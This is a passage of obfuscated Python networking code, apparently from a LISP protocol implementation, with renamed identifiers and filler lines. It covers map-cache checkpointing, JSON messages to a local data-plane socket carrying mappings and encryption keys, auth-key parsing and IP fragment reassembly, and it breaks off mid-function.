if 81 - 81: IiII . ooOoO0o + O0 . ooOoO0o + iIii1I11I1II1
if 68 - 68: i11iIiiIii . iII111i + OoooooooOO + II111iiii + iIii1I11I1II1 % I11i
if 7 - 7: i1IIi - o0oOOo0O0Ooo - I1IiiI
if 62 - 62: OoOoOO00 * oO0o - I1IiiI / Ii1I
if 48 - 48: o0oOOo0O0Ooo % o0oOOo0O0Ooo - OoOoOO00
if 13 - 13: OoO0O00 - Ii1I . ooOoO0o / O0 * OoOoOO00
if 57 - 57: O0 + OoooooooOO % o0oOOo0O0Ooo / I1Ii111 / OOooOOo - OoOoOO00
if 48 - 48: o0oOOo0O0Ooo - II111iiii + OoOoOO00
def lisp_checkpoint ( checkpoint_list ) :
if ( lisp_checkpoint_map_cache == False ) : return
if 54 - 54: II111iiii - OoO0O00 - o0oOOo0O0Ooo - O0 % I1Ii111
o0OoO0 = open ( lisp_checkpoint_filename , "w" )
for oo0O00OOOOO in checkpoint_list :
o0OoO0 . write ( oo0O00OOOOO + "\n" )
if 9 - 9: i1IIi % iII111i / Ii1I
o0OoO0 . close ( )
lprint ( "{} {} entries to file '{}'" . format ( bold ( "Checkpoint" , False ) ,
len ( checkpoint_list ) , lisp_checkpoint_filename ) )
return
if 83 - 83: oO0o
if 1 - 1: oO0o * iIii1I11I1II1 % iIii1I11I1II1 % iIii1I11I1II1 / oO0o + IiII
if 29 - 29: OoooooooOO
if 55 - 55: O0 - o0oOOo0O0Ooo % I1ii11iIi11i * I11i * oO0o
if 83 - 83: iIii1I11I1II1
if 92 - 92: OoO0O00 - iII111i
if 97 - 97: ooOoO0o / I11i . IiII + I1Ii111 . iIii1I11I1II1
if 24 - 24: ooOoO0o - oO0o % OoOoOO00 * Oo0Ooo
def lisp_load_checkpoint ( ) :
if ( lisp_checkpoint_map_cache == False ) : return
if ( os . path . exists ( lisp_checkpoint_filename ) == False ) : return
if 54 - 54: Ii1I - OoooooooOO % I1IiiI + oO0o
o0OoO0 = open ( lisp_checkpoint_filename , "r" )
if 70 - 70: I1Ii111 % iIii1I11I1II1
O0oo0oOo = 0
for oo0O00OOOOO in o0OoO0 :
O0oo0oOo += 1
oO0ooOOO = oo0O00OOOOO . split ( " rloc " )
OOOO00 = [ ] if ( oO0ooOOO [ 1 ] in [ "native-forward\n" , "\n" ] ) else oO0ooOOO [ 1 ] . split ( ", " )
if 74 - 74: i1IIi % i11iIiiIii + oO0o
if 94 - 94: OoO0O00 * I1IiiI / O0 + I1Ii111 / i11iIiiIii
OO00O000OOO = [ ]
for iIIiI11 in OOOO00 :
OOOoOoo = lisp_rloc ( False )
iiiI1I = iIIiI11 . split ( " " )
OOOoOoo . rloc . store_address ( iiiI1I [ 0 ] )
OOOoOoo . priority = int ( iiiI1I [ 1 ] )
OOOoOoo . weight = int ( iiiI1I [ 2 ] )
OO00O000OOO . append ( OOOoOoo )
if 34 - 34: Oo0Ooo . i1IIi
if 97 - 97: I11i
I11iiI1III = lisp_mapping ( "" , "" , OO00O000OOO )
if ( I11iiI1III != None ) :
I11iiI1III . eid . store_prefix ( oO0ooOOO [ 0 ] )
I11iiI1III . checkpoint_entry = True
I11iiI1III . map_cache_ttl = LISP_NMR_TTL * 60
if ( OO00O000OOO == [ ] ) : I11iiI1III . action = LISP_NATIVE_FORWARD_ACTION
I11iiI1III . add_cache ( )
continue
if 89 - 89: iII111i % OoOoOO00 . Oo0Ooo
if 20 - 20: oO0o % OoOoOO00
O0oo0oOo -= 1
if 93 - 93: I1ii11iIi11i - Ii1I % i1IIi / i1IIi
if 82 - 82: OOooOOo
o0OoO0 . close ( )
lprint ( "{} {} map-cache entries from file '{}'" . format (
bold ( "Loaded" , False ) , O0oo0oOo , lisp_checkpoint_filename ) )
return
if 27 - 27: I1Ii111 / IiII - i1IIi * Ii1I
if 90 - 90: ooOoO0o
if 100 - 100: iII111i * i1IIi . iII111i / O0 / OoO0O00 - oO0o
if 65 - 65: OoOoOO00 + ooOoO0o * OoO0O00 % OoooooooOO + OoooooooOO * OoooooooOO
if 49 - 49: o0oOOo0O0Ooo + i1IIi / iII111i
if 43 - 43: i1IIi . OoO0O00 + I1ii11iIi11i
if 88 - 88: OoooooooOO / I11i % II111iiii % OOooOOo - I11i
if 55 - 55: Oo0Ooo - OOooOOo - O0
if 40 - 40: OoOoOO00 - OOooOOo
if 3 - 3: IiII % I11i * I1Ii111 + iIii1I11I1II1 . oO0o
if 35 - 35: II111iiii
if 15 - 15: I11i * iIii1I11I1II1 + OOooOOo % IiII . o0oOOo0O0Ooo % Oo0Ooo
if 96 - 96: O0
if 15 - 15: i1IIi . iIii1I11I1II1
def lisp_write_checkpoint_entry ( checkpoint_list , mc ) :
if ( lisp_checkpoint_map_cache == False ) : return
if 3 - 3: II111iiii * i11iIiiIii * i1IIi - i1IIi
oo0O00OOOOO = "{} rloc " . format ( mc . eid . print_prefix ( ) )
if 11 - 11: I1IiiI % Ii1I * i11iIiiIii % OOooOOo + II111iiii
for OOOoOoo in mc . rloc_set :
if ( OOOoOoo . rloc . is_null ( ) ) : continue
oo0O00OOOOO += "{} {} {}, " . format ( OOOoOoo . rloc . print_address_no_iid ( ) ,
OOOoOoo . priority , OOOoOoo . weight )
if 61 - 61: I1Ii111 + I11i + I1IiiI
if 48 - 48: I11i
if ( mc . rloc_set != [ ] ) :
oo0O00OOOOO = oo0O00OOOOO [ 0 : - 2 ]
elif ( mc . action == LISP_NATIVE_FORWARD_ACTION ) :
oo0O00OOOOO += "native-forward"
if 67 - 67: o0oOOo0O0Ooo
if 36 - 36: IiII - I11i - Ii1I / OoOoOO00 % OoO0O00 * iIii1I11I1II1
checkpoint_list . append ( oo0O00OOOOO )
return
if 61 - 61: i11iIiiIii / Ii1I - OOooOOo . I1ii11iIi11i
if 89 - 89: ooOoO0o % i11iIiiIii
if 57 - 57: Oo0Ooo / ooOoO0o - O0 . ooOoO0o
if 61 - 61: o0oOOo0O0Ooo / OoooooooOO . I1ii11iIi11i + Oo0Ooo
if 75 - 75: Ii1I
if 79 - 79: i1IIi . I1ii11iIi11i * o0oOOo0O0Ooo / I11i . I11i / ooOoO0o
if 99 - 99: oO0o + I11i % i1IIi . iII111i
def lisp_check_dp_socket ( ) :
OOoooOOOoo = lisp_ipc_dp_socket_name
if ( os . path . exists ( OOoooOOOoo ) == False ) :
OOI11iiiiiII1 = bold ( "does not exist" , False )
lprint ( "Socket '{}' {}" . format ( OOoooOOOoo , OOI11iiiiiII1 ) )
return ( False )
if 6 - 6: I1Ii111 + OoO0O00 + O0 * OoOoOO00 . iIii1I11I1II1 . I1Ii111
return ( True )
if 93 - 93: ooOoO0o % iIii1I11I1II1 + I1ii11iIi11i
if 74 - 74: OoOoOO00 + I1ii11iIi11i
if 82 - 82: II111iiii
if 55 - 55: I11i . iIii1I11I1II1 / Ii1I - OoO0O00 * I1ii11iIi11i % iIii1I11I1II1
if 48 - 48: ooOoO0o + Oo0Ooo / Oo0Ooo
if 15 - 15: iIii1I11I1II1 . I1Ii111 * OoooooooOO * O0 % OOooOOo
if 53 - 53: Ii1I
def lisp_write_to_dp_socket ( entry ) :
try :
o0OO0ooooO = json . dumps ( entry )
I1IiI11iI1Iii = bold ( "Write IPC" , False )
lprint ( "{} record to named socket: '{}'" . format ( I1IiI11iI1Iii , o0OO0ooooO ) )
lisp_ipc_dp_socket . sendto ( o0OO0ooooO , lisp_ipc_dp_socket_name )
except :
lprint ( "Failed to write IPC record to named socket: '{}'" . format ( o0OO0ooooO ) )
if 88 - 88: o0oOOo0O0Ooo + OoooooooOO - OoO0O00 / I1Ii111 / OoooooooOO
return
if 8 - 8: i11iIiiIii / O0 * OOooOOo * i1IIi
if 57 - 57: O0 - IiII
if 66 - 66: OOooOOo % i11iIiiIii % OoooooooOO - o0oOOo0O0Ooo + OoOoOO00 + OoooooooOO
if 66 - 66: OoOoOO00 . Ii1I / i11iIiiIii / ooOoO0o
if 76 - 76: OoO0O00 % OoO0O00 / I1ii11iIi11i * ooOoO0o * o0oOOo0O0Ooo - I1Ii111
if 53 - 53: OoO0O00 % Oo0Ooo . i1IIi
if 34 - 34: Ii1I - o0oOOo0O0Ooo * i1IIi
if 7 - 7: OoO0O00 * I1ii11iIi11i / I1Ii111
if 98 - 98: II111iiii % I1ii11iIi11i
def lisp_write_ipc_keys ( rloc ) :
O0O0 = rloc . rloc . print_address_no_iid ( )
ooO0 = rloc . translated_port
if ( ooO0 != 0 ) : O0O0 += ":" + str ( ooO0 )
if ( O0O0 not in lisp_rloc_probe_list ) : return
if 48 - 48: iII111i % oO0o + oO0o - Oo0Ooo . OOooOOo
for iiiI1I , oO0ooOOO , Oo in lisp_rloc_probe_list [ O0O0 ] :
I11iiI1III = lisp_map_cache . lookup_cache ( oO0ooOOO , True )
if ( I11iiI1III == None ) : continue
lisp_write_ipc_map_cache ( True , I11iiI1III )
if 38 - 38: iII111i
return
if 66 - 66: iII111i + Oo0Ooo + i1IIi * Oo0Ooo
if 18 - 18: O0 - IiII
if 5 - 5: I1ii11iIi11i * iII111i + II111iiii * Oo0Ooo * O0 - I1IiiI
if 71 - 71: i11iIiiIii % I1IiiI + I1ii11iIi11i + II111iiii + OoooooooOO + oO0o
if 12 - 12: I1IiiI + I1Ii111
if 66 - 66: I1Ii111 + OOooOOo + I1Ii111 . OoooooooOO * oO0o / OoO0O00
if 74 - 74: O0 % OOooOOo * OoOoOO00 / oO0o - Oo0Ooo
def lisp_write_ipc_map_cache ( add_or_delete , mc , dont_send = False ) :
if ( lisp_i_am_etr ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 79 - 79: Ii1I + IiII
if 21 - 21: o0oOOo0O0Ooo * iII111i * o0oOOo0O0Ooo * o0oOOo0O0Ooo . Oo0Ooo
if 98 - 98: I1ii11iIi11i
if 58 - 58: IiII / i11iIiiIii % I11i
oOOoo = "add" if add_or_delete else "delete"
oo0O00OOOOO = { "type" : "map-cache" , "opcode" : oOOoo }
if 74 - 74: OoooooooOO - I1ii11iIi11i + OOooOOo % IiII . o0oOOo0O0Ooo
II1OO0Oo0oOOO000 = ( mc . group . is_null ( ) == False )
if ( II1OO0Oo0oOOO000 ) :
oo0O00OOOOO [ "eid-prefix" ] = mc . group . print_prefix_no_iid ( )
oo0O00OOOOO [ "rles" ] = [ ]
else :
oo0O00OOOOO [ "eid-prefix" ] = mc . eid . print_prefix_no_iid ( )
oo0O00OOOOO [ "rlocs" ] = [ ]
if 21 - 21: Ii1I
oo0O00OOOOO [ "instance-id" ] = str ( mc . eid . instance_id )
if 72 - 72: I1Ii111 . OoooooooOO / I1Ii111 - Ii1I / I1ii11iIi11i * I1ii11iIi11i
if ( II1OO0Oo0oOOO000 ) :
if ( len ( mc . rloc_set ) >= 1 and mc . rloc_set [ 0 ] . rle ) :
for iIIi in mc . rloc_set [ 0 ] . rle . rle_forwarding_list :
IiI = iIIi . address . print_address_no_iid ( )
ooO0 = str ( 4341 ) if iIIi . translated_port == 0 else str ( iIIi . translated_port )
if 72 - 72: IiII . Ii1I + OoooooooOO * OoOoOO00 + Oo0Ooo . iII111i
iiiI1I = { "rle" : IiI , "port" : ooO0 }
iiIio0o0 , OoO0OOo0OOoOO = iIIi . get_encap_keys ( )
iiiI1I = lisp_build_json_keys ( iiiI1I , iiIio0o0 , OoO0OOo0OOoOO , "encrypt-key" )
oo0O00OOOOO [ "rles" ] . append ( iiiI1I )
if 91 - 91: OOooOOo % Oo0Ooo
if 44 - 44: iIii1I11I1II1 . OOooOOo
else :
for iIIiI11 in mc . rloc_set :
if ( iIIiI11 . rloc . is_ipv4 ( ) == False and iIIiI11 . rloc . is_ipv6 ( ) == False ) :
continue
if 57 - 57: II111iiii + I1Ii111
if ( iIIiI11 . up_state ( ) == False ) : continue
if 42 - 42: OoOoOO00 % O0
ooO0 = str ( 4341 ) if iIIiI11 . translated_port == 0 else str ( iIIiI11 . translated_port )
if 70 - 70: iIii1I11I1II1 * Oo0Ooo - I1IiiI / OoO0O00 + OoOoOO00
iiiI1I = { "rloc" : iIIiI11 . rloc . print_address_no_iid ( ) , "priority" :
str ( iIIiI11 . priority ) , "weight" : str ( iIIiI11 . weight ) , "port" :
ooO0 }
iiIio0o0 , OoO0OOo0OOoOO = iIIiI11 . get_encap_keys ( )
iiiI1I = lisp_build_json_keys ( iiiI1I , iiIio0o0 , OoO0OOo0OOoOO , "encrypt-key" )
oo0O00OOOOO [ "rlocs" ] . append ( iiiI1I )
if 94 - 94: OoooooooOO + O0 * iIii1I11I1II1 * II111iiii
if 90 - 90: I11i + O0 / I1IiiI . oO0o / O0
if 46 - 46: O0 . O0 - oO0o . II111iiii * I1IiiI * Ii1I
if ( dont_send == False ) : lisp_write_to_dp_socket ( oo0O00OOOOO )
return ( oo0O00OOOOO )
if 10 - 10: i1IIi + i1IIi . i1IIi - I1IiiI - I1IiiI
if 26 - 26: Ii1I * I11i / I11i
if 79 - 79: ooOoO0o / oO0o - oO0o / OoooooooOO
if 91 - 91: iIii1I11I1II1 - O0 * o0oOOo0O0Ooo * o0oOOo0O0Ooo . II111iiii
if 69 - 69: II111iiii - Oo0Ooo + i1IIi . II111iiii + o0oOOo0O0Ooo
if 20 - 20: OoooooooOO - OoO0O00 * ooOoO0o * OoOoOO00 / OOooOOo
if 64 - 64: O0 + iII111i / I11i * OoOoOO00 + o0oOOo0O0Ooo + I1Ii111
def lisp_write_ipc_decap_key ( rloc_addr , keys ) :
if ( lisp_i_am_itr ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 16 - 16: I11i
if 9 - 9: Ii1I / IiII * I11i - i11iIiiIii * I1ii11iIi11i / iII111i
if 61 - 61: O0 % iII111i
if 41 - 41: I1Ii111 * OoooooooOO
if ( keys == None or len ( keys ) == 0 or keys [ 1 ] == None ) : return
if 76 - 76: OoooooooOO * II111iiii . II111iiii / o0oOOo0O0Ooo - iII111i
iiIio0o0 = keys [ 1 ] . encrypt_key
OoO0OOo0OOoOO = keys [ 1 ] . icv_key
if 49 - 49: O0 . I1ii11iIi11i . OoOoOO00 . I1Ii111 % O0 . iIii1I11I1II1
if 19 - 19: iIii1I11I1II1
if 97 - 97: Ii1I . I11i / ooOoO0o + Oo0Ooo
if 100 - 100: iII111i / I1Ii111 % OoOoOO00 . O0 / OoOoOO00
OOooOO000oo = rloc_addr . split ( ":" )
if ( len ( OOooOO000oo ) == 1 ) :
oo0O00OOOOO = { "type" : "decap-keys" , "rloc" : OOooOO000oo [ 0 ] }
else :
oo0O00OOOOO = { "type" : "decap-keys" , "rloc" : OOooOO000oo [ 0 ] , "port" : OOooOO000oo [ 1 ] }
if 78 - 78: Oo0Ooo % O0 / i11iIiiIii
oo0O00OOOOO = lisp_build_json_keys ( oo0O00OOOOO , iiIio0o0 , OoO0OOo0OOoOO , "decrypt-key" )
if 56 - 56: IiII - OOooOOo - OoOoOO00 - I11i
lisp_write_to_dp_socket ( oo0O00OOOOO )
return
if 57 - 57: i1IIi
if 41 - 41: I11i / Ii1I
if 1 - 1: II111iiii / iII111i
if 83 - 83: OoO0O00 / iII111i
if 59 - 59: I1Ii111 % OOooOOo . I1IiiI + I1ii11iIi11i % oO0o
if 96 - 96: OoO0O00
if 53 - 53: oO0o + OoO0O00
if 58 - 58: iIii1I11I1II1 + OoOoOO00
def lisp_build_json_keys ( entry , ekey , ikey , key_type ) :
if ( ekey == None ) : return ( entry )
if 65 - 65: iII111i % Oo0Ooo * iIii1I11I1II1 + I1IiiI + II111iiii
entry [ "keys" ] = [ ]
III = { "key-id" : "1" , key_type : ekey , "icv-key" : ikey }
entry [ "keys" ] . append ( III )
return ( entry )
if 72 - 72: OoOoOO00 . OoooooooOO - OOooOOo
if 15 - 15: OoOoOO00
if 13 - 13: I1ii11iIi11i - OOooOOo - i11iIiiIii / IiII
if 65 - 65: IiII
if 76 - 76: I1Ii111 % I1ii11iIi11i + ooOoO0o / I1IiiI
if 59 - 59: OOooOOo - o0oOOo0O0Ooo - o0oOOo0O0Ooo % I1IiiI
if 55 - 55: o0oOOo0O0Ooo % I1ii11iIi11i - IiII + OoooooooOO
def lisp_write_ipc_database_mappings ( ephem_port ) :
if ( lisp_i_am_etr == False ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 44 - 44: iII111i * I1Ii111 - I1IiiI % i1IIi
if 35 - 35: iII111i . OoOoOO00 + i1IIi . I1Ii111 - oO0o
if 92 - 92: o0oOOo0O0Ooo
if 8 - 8: i1IIi / IiII . O0
oo0O00OOOOO = { "type" : "database-mappings" , "database-mappings" : [ ] }
if 72 - 72: OOooOOo
if 20 - 20: i11iIiiIii + Oo0Ooo * Oo0Ooo % OOooOOo
if 66 - 66: I1ii11iIi11i + iII111i / Ii1I / I1IiiI * i11iIiiIii
if 41 - 41: Ii1I / Oo0Ooo . OoO0O00 . iIii1I11I1II1 % IiII . I11i
for OoO0oO in lisp_db_list :
if ( OoO0oO . eid . is_ipv4 ( ) == False and OoO0oO . eid . is_ipv6 ( ) == False ) : continue
OoOo00 = { "instance-id" : str ( OoO0oO . eid . instance_id ) ,
"eid-prefix" : OoO0oO . eid . print_prefix_no_iid ( ) }
oo0O00OOOOO [ "database-mappings" ] . append ( OoOo00 )
if 36 - 36: oO0o . I1ii11iIi11i % Oo0Ooo * oO0o + I1IiiI
lisp_write_to_dp_socket ( oo0O00OOOOO )
if 15 - 15: ooOoO0o - Ii1I * OoOoOO00
if 80 - 80: i1IIi % OOooOOo - ooOoO0o % iII111i . I1Ii111 + I1ii11iIi11i
if 9 - 9: OoooooooOO . iII111i . iIii1I11I1II1 . I11i % ooOoO0o % I1IiiI
if 78 - 78: OoO0O00 - ooOoO0o * I1IiiI * iII111i . i1IIi - OOooOOo
if 47 - 47: oO0o + ooOoO0o . OoooooooOO / ooOoO0o + i1IIi / I1Ii111
oo0O00OOOOO = { "type" : "etr-nat-port" , "port" : ephem_port }
lisp_write_to_dp_socket ( oo0O00OOOOO )
return
if 92 - 92: I1IiiI
if 56 - 56: I1Ii111 . Oo0Ooo
if 29 - 29: I1IiiI * Ii1I . OoooooooOO
if 18 - 18: I11i % iIii1I11I1II1 * OOooOOo
if 58 - 58: i11iIiiIii / OoOoOO00
if 18 - 18: ooOoO0o + O0 - OOooOOo + iIii1I11I1II1 . OOooOOo * iIii1I11I1II1
if 83 - 83: OoO0O00 - Oo0Ooo * I1IiiI % Oo0Ooo % oO0o
def lisp_write_ipc_interfaces ( ) :
if ( lisp_i_am_etr ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 64 - 64: OoOoOO00 + oO0o / OoooooooOO . i11iIiiIii / II111iiii
if 55 - 55: ooOoO0o . i11iIiiIii . o0oOOo0O0Ooo
if 52 - 52: IiII . oO0o + i11iIiiIii % IiII
if 45 - 45: i1IIi - I1IiiI / IiII - I1IiiI
oo0O00OOOOO = { "type" : "interfaces" , "interfaces" : [ ] }
if 21 - 21: IiII
for i111IIiIiiI1 in list ( lisp_myinterfaces . values ( ) ) :
if ( i111IIiIiiI1 . instance_id == None ) : continue
OoOo00 = { "interface" : i111IIiIiiI1 . device ,
"instance-id" : str ( i111IIiIiiI1 . instance_id ) }
oo0O00OOOOO [ "interfaces" ] . append ( OoOo00 )
if 43 - 43: IiII
if 9 - 9: OOooOOo * ooOoO0o + ooOoO0o . I1Ii111
lisp_write_to_dp_socket ( oo0O00OOOOO )
return
if 8 - 8: IiII * iIii1I11I1II1
if 7 - 7: I1Ii111 / OoooooooOO % O0 - I1ii11iIi11i
if 49 - 49: OoooooooOO . I1ii11iIi11i / OoooooooOO * oO0o
if 81 - 81: I1ii11iIi11i . ooOoO0o + I1ii11iIi11i
if 84 - 84: OoooooooOO
if 95 - 95: o0oOOo0O0Ooo
if 22 - 22: ooOoO0o / o0oOOo0O0Ooo - OoooooooOO / Oo0Ooo - I1Ii111 / OOooOOo
if 41 - 41: oO0o . II111iiii
if 47 - 47: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 23 - 23: i11iIiiIii / I11i + i1IIi % I1Ii111
if 100 - 100: Oo0Ooo
if 13 - 13: I1IiiI + ooOoO0o * II111iiii
if 32 - 32: iIii1I11I1II1 + O0 + i1IIi
def lisp_parse_auth_key ( value ) :
Iii1iIi1i = value . split ( "[" )
i11i1Ii = { }
if ( len ( Iii1iIi1i ) == 1 ) :
i11i1Ii [ 0 ] = value
return ( i11i1Ii )
if 9 - 9: o0oOOo0O0Ooo
if 20 - 20: ooOoO0o - I1Ii111 % II111iiii - O0
for Ooo0oO0O00o0 in Iii1iIi1i :
if ( Ooo0oO0O00o0 == "" ) : continue
OOOooo0OooOoO = Ooo0oO0O00o0 . find ( "]" )
IiII11iI1 = Ooo0oO0O00o0 [ 0 : OOOooo0OooOoO ]
try : IiII11iI1 = int ( IiII11iI1 )
except : return
if 76 - 76: i1IIi + iII111i * iII111i
i11i1Ii [ IiII11iI1 ] = Ooo0oO0O00o0 [ OOOooo0OooOoO + 1 : : ]
if 31 - 31: O0 - iIii1I11I1II1 . I11i . oO0o
return ( i11i1Ii )
if 96 - 96: OoooooooOO * iIii1I11I1II1 * Oo0Ooo
if 76 - 76: OoO0O00 / i11iIiiIii % ooOoO0o % I11i * O0
if 84 - 84: II111iiii - iII111i / IiII . O0 % i1IIi / I1ii11iIi11i
if 2 - 2: OoooooooOO . OoO0O00 . II111iiii / Ii1I - OOooOOo % Oo0Ooo
if 47 - 47: OOooOOo * oO0o
if 41 - 41: OoooooooOO * I1IiiI
if 3 - 3: IiII
if 96 - 96: I11i - OOooOOo + I11i
if 71 - 71: Oo0Ooo
if 48 - 48: o0oOOo0O0Ooo / II111iiii / OoOoOO00 * o0oOOo0O0Ooo + I1IiiI . OoOoOO00
if 52 - 52: Ii1I / OoOoOO00 . OOooOOo * IiII . OoooooooOO
if 6 - 6: i1IIi . oO0o % IiII . Oo0Ooo % I11i
if 86 - 86: OoooooooOO + IiII % o0oOOo0O0Ooo . i1IIi . iII111i
if 25 - 25: iII111i * I1ii11iIi11i + I11i - I1ii11iIi11i
if 75 - 75: IiII
if 74 - 74: o0oOOo0O0Ooo - iIii1I11I1II1
def lisp_reassemble ( packet ) :
Oo0ooo = socket . ntohs ( struct . unpack ( "H" , packet [ 6 : 8 ] ) [ 0 ] )
if 92 - 92: i11iIiiIii * iIii1I11I1II1 - I1Ii111 . i1IIi
if 23 - 23: O0 - O0 . I1Ii111 . I1IiiI - I1IiiI * i1IIi
if 8 - 8: I1IiiI . I1ii11iIi11i + oO0o % oO0o * oO0o
if 70 - 70: II111iiii + IiII + O0 / Ii1I - i11iIiiIii
if ( Oo0ooo == 0 or Oo0ooo == 0x4000 ) : return ( packet )
if 72 - 72: II111iiii - II111iiii
if 44 - 44: o0oOOo0O0Ooo + OoooooooOO
if 34 - 34: i11iIiiIii + iIii1I11I1II1 - i11iIiiIii * o0oOOo0O0Ooo - iII111i
if 87 - 87: OOooOOo * OoO0O00
OOoo0 = socket . ntohs ( struct . unpack ( "H" , packet [ 4 : 6 ] ) [ 0 ] )
oOi11iIIIIi = socket . ntohs ( struct . unpack ( "H" , packet [ 2 : 4 ] ) [ 0 ] )
if 61 - 61: iII111i - II111iiii . I1Ii111 % II111iiii / I11i
o000O = ( Oo0ooo & 0x2000 == 0 and ( Oo0ooo & 0x1fff ) != 0 )
oo0O00OOOOO = [ ( Oo0ooo & 0x1fff ) * 8 , oOi11iIIIIi - 20 , packet , o000O ]
if 88 - 88: Ii1I % Oo0Ooo / Oo0Ooo - O0 - Oo0Ooo
if 17 - 17: II111iiii - i1IIi
if 91 - 91: Ii1I
if 45 - 45: I1ii11iIi11i + Oo0Ooo
if 72 - 72: I1ii11iIi11i
if 5 - 5: i1IIi
if 31 - 31: iII111i - OoooooooOO + oO0o / OoooooooOO + I1ii11iIi11i
if 93 - 93: o0oOOo0O0Ooo * I1ii11iIi11i % I1IiiI * ooOoO0o
if ( Oo0ooo == 0x2000 ) :
oooooO0oO0ooO , iIII1IiI = struct . unpack ( "HH" , packet [ 20 : 24 ] )
oooooO0oO0ooO = socket . ntohs ( oooooO0oO0ooO )
iIII1IiI = socket . ntohs ( iIII1IiI )
if ( iIII1IiI not in [ 4341 , 8472 , 4789 ] and oooooO0oO0ooO != 4341 ) :
lisp_reassembly_queue [ OOoo0 ] = [ ]
oo0O00OOOOO [ 2 ] = None
if 37 - 37: OoO0O00 * OoooooooOO / oO0o * I11i * I1ii11iIi11i
if 42 - 42: OoooooooOO - ooOoO0o . OOooOOo + OoOoOO00
if 53 - 53: o0oOOo0O0Ooo
if 55 - 55: ooOoO0o . i1IIi - ooOoO0o + O0 + I1IiiI
if 31 - 31: OoO0O00 % I1Ii111
if 62 - 62: oO0o / O0 - I1Ii111 . IiII
if ( OOoo0 not in lisp_reassembly_queue ) :
lisp_reassembly_queue [ OOoo0 ] = [ ]
if 81 - 81: i11iIiiIii
if 57 - 57: O0
if 85 - 85: i11iIiiIii - i11iIiiIii - OoOoOO00 / II111iiii - II111iiii
if 4 - 4: I1ii11iIi11i * O0 / OoO0O00 * II111iiii . iIii1I11I1II1 / OOooOOo
if 97 - 97: i1IIi - OoOoOO00 . OoooooooOO
queue = lisp_reassembly_queue [ OOoo0 ]
if 24 - 24: iIii1I11I1II1 + OOooOOo * iII111i % IiII % OOooOOo
if 64 - 64: IiII . I1ii11iIi11i - o0oOOo0O0Ooo - ooOoO0o + OoooooooOO
if 95 - 95: iII111i . I1ii11iIi11i + ooOoO0o + o0oOOo0O0Ooo % OoO0O00
if 50 - 50: iII111i * O0 % II111iiii
if 80 - 80: OOooOOo - II111iiii - OoO0O00
if ( len ( queue ) == 1 and queue [ 0 ] [ 2 ] == None ) :
dprint ( "Drop non-LISP encapsulated fragment 0x{}" . format ( lisp_hex_string ( OOoo0 ) . zfill ( 4 ) ) )
if 62 - 62: Ii1I . i11iIiiIii % OOooOOo
return ( None )
if 44 - 44: i1IIi * I1ii11iIi11i % Ii1I . Ii1I * I11i + II111iiii
if 15 - 15: i1IIi - I11i - I1Ii111 / OoO0O00 + Oo0Ooo + I1IiiI
if 81 - 81: IiII
if 54 - 54: I1IiiI % OoO0O00 % OoOoOO00
if 12 - 12: II111iiii . O0 * i11iIiiIii . I11i
queue . append ( oo0O00OOOOO )
queue = sorted ( queue )
if 98 - 98: II111iiii + i1IIi * oO0o % I1IiiI
if 53 - 53: i11iIiiIii . I1ii11iIi11i - OOooOOo - OOooOOo
if 97 - 97: I1IiiI % iII111i % OoooooooOO / ooOoO0o / i11iIiiIii
if 7 - 7: O0 % IiII / o0oOOo0O0Ooo
IiI = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
IiI . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
o00O0O0 = IiI . print_address_no_iid ( )
IiI . address = socket . ntohl ( struct . unpack ( "I" , packet [ 16 : 20 ] ) [ 0 ] )
I111II11IIii = IiI . print_address_no_iid ( )
IiI = red ( "{} -> {}" . format ( o00O0O0 , I111II11IIii ) , False )
if 37 - 37: OoooooooOO % II111iiii / o0oOOo0O0Ooo . OOooOOo * I1ii11iIi11i . iIii1I11I1II1
dprint ( "{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}" . format ( bold ( "Received" , False ) , " non-LISP encapsulated" if oo0O00OOOOO [ 2 ] == None else "" , IiI , lisp_hex_string ( OOoo0 ) . zfill ( 4 ) ,
# OoOoOO00 . i1IIi + Oo0Ooo / O0 - IiII
# Oo0Ooo / ooOoO0o + II111iiii + OoooooooOO * iIii1I11I1II1
lisp_hex_string ( Oo0ooo ) . zfill ( 4 ) ) )
if 82 - 82: i1IIi - I11i % ooOoO0o . OoOoOO00 * o0oOOo0O0Ooo
if 20 - 20: i11iIiiIii - O0 / i11iIiiIii
if 51 - 51: iII111i . ooOoO0o
if 70 - 70: I11i / O0 - I11i + o0oOOo0O0Ooo . ooOoO0o . o0oOOo0O0Ooo
if 6 - 6: I11i + II111iiii - I1Ii111
if ( queue [ 0 ] [ 0 ] != 0 or queue [ - 1 ] [ 3 ] == False ) : return ( None )
IiI1 = queue [ 0 ]
for Ii in queue [ 1 : : ] :
Oo0ooo = Ii [ 0 ]
o0o0oOo , I11iiI1iIiiII = IiI1 [ 0 ] , IiI1 [ 1 ]
if ( o0o0oOo + I11iiI1iIiiII != Oo0ooo ) : return ( None )
IiI1 = Ii
if 11 - 11: Oo0Ooo - o0oOOo0O0Ooo
lisp_reassembly_queue . pop ( OOoo0 )
if 45 - 45: ooOoO0o - oO0o - I1IiiI
if 21 - 21: OoooooooOO
if 28 - 28: I1ii11iIi11i + oO0o . Oo0Ooo % iIii1I11I1II1 / I1Ii111
if 8 - 8: O0 . I1IiiI * o0oOOo0O0Ooo + I1IiiI
if 44 - 44: i1IIi % iII111i . i11iIiiIii / I11i + OoooooooOO
packet = queue [ 0 ] [ 2 ]
for Ii in queue [ 1 : : ] : packet += Ii [ 2 ] [ 20 : : ]
if 21 - 21: OoOoOO00 . OoO0O00 . OoOoOO00 + OoOoOO00
dprint ( "{} fragments arrived for packet 0x{}, length {}" . format ( bold ( "All" , False ) , lisp_hex_string ( OOoo0 ) . zfill ( 4 ) , len ( packet ) ) )
if 30 - 30: I1IiiI - iII111i - OOooOOo + oO0o
if 51 - 51: Ii1I % O0 / II111iiii . Oo0Ooo
if 90 - 90: i11iIiiIii * II111iiii % iIii1I11I1II1 . I1ii11iIi11i / Oo0Ooo . OOooOOo
if 77 - 77: OoO0O00
if 95 - 95: II111iiii
i1iIii = socket . htons ( len ( packet ) )
